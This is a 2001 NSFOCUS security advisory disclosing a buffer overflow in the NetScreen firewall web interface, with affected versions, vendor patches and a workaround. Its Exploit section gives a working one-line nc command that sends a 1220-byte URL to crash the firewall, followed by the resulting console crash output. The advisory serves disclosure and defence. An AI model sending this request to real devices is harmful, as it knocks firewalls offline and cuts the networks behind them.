NSFOCUS Security Advisory(SA2001-01)



Topic:  NetScreen Firewall WebUI Buffer Overflow vulnerability



Release Date£º Jan 9th, 2001



CVE Candidate Numbers: CAN-2001-0007



Affected system:

================



ScreenOS release 1.73r1 on the NetScreen-1000

ScreenOS release 2.01r6 on the NetScreen-10/100

ScreenOS release 2.10r3 on the NetScreen-5

ScreenOS release 2.5r1  on the NetScreen-5/10/100



Non-affected system£º

====================



ScreenOS release 1.73r2 on the NetScreen-1000

ScreenOS release 2.01r7 on the NetScreen-10/100

ScreenOS release 2.10r4 on the NetScreen-5

ScreenOS release 2.5r2  on the NetScreen-5/10/100



Impact:

=========



NSFOCUS security team has found a buffer overflow vulnerability in

NetScreen Firewall WebUI. Exploitation of this vulnerability,

malicious user can launch remote DoS attack to crash the firewall.



Description£º

============



NetScreen Firewall is a popular commercial firewall. It has a Web

administration interface (default listening at port 80) that allows

firewall administrator to configure firewall with browser. However,

it is lack of length check-up of input URL. Provided with a oversized

URL request, a buffer overflow may take place that will crash the

NetScreen firewall. In that case, all connections through firewall

will be dropped, and the firewall won't response to any connection

request. Rebooting the firewall is required to regain its functions.



Attackers can launch attack without logining firewall.



All current versions of ScreeOS, including 1.73r1, 2.0r6, 2.1r3 and

2.5r1 are affected by this vulnerability on occasion that WebUI has

been enabled .





Exploit:

==========



Once the input URL is longer than 1220 bytes£¬NetScreen firewall will

crash:



$echo -e "GET /`perl -e 'print "A"x1220'` HTTP/1.0\n\n"|nc netscreen_firewall 80



Following information will appear on firewall console£º



****************************** EXCEPTION ******************************



Bus error execption (data reference: load or store)



EPC   = 0x8009AA1C,   SR    = 0x34501007,   Cause = 0x0080001C



Firewall halts now.





Workaround:

===================



Disable WebUI management or appoint trusted administration host before

acquirement and installation of relevant patch.



Vendor Status:

==============



We have notified NetScreen of this vulnerability on 12/19/2000 .

On 12/26/2000 NetScreen has issued following ScreenOS release versions

to fix the bug:



ScreenOS 1.73r2  on the NetScreen-1000

ScreenOS 2.10r4  on the NetScreen-5

ScreenOS 2.01r7  on the NetScreen-10/100

ScreenOS 2.5.0r2 on the NetScreen-5/10/100



Latest software are available at:

http://www.netscreen.com/support/updates.html

You can also contact NetScreen Technical Support Center

(mailto:support@netscreen.com) for upgraded software.



Additional Information:

========================



The Common Vulnerabilities and Exposures (CVE) project has

assigned the name CAN-2001-0007 to this issue. This is a

candidate for inclusion in the CVE list (http://cve.mitre.org),

which standardizes names for security problems.  Candidates

may change significantly before they become official CVE entries.



DISCLAIMS:

==========

THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY

OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED,

EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL NSFOCUS

BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,

INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,

EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

DISTRIBUTION OR REPRODUTION OF THE INFORMATION IS PROVIDED THAT THE

ADVISORY IS NOT MODIFIED IN ANY WAY.



?Copyright 1999-2000 NSFOCUS. All Rights Reserved. Terms of use.





NSFOCUS Security Team 

NSFOCUS INFORMATION TECHNOLOGY CO.,LTD

(http://www.nsfocus.com)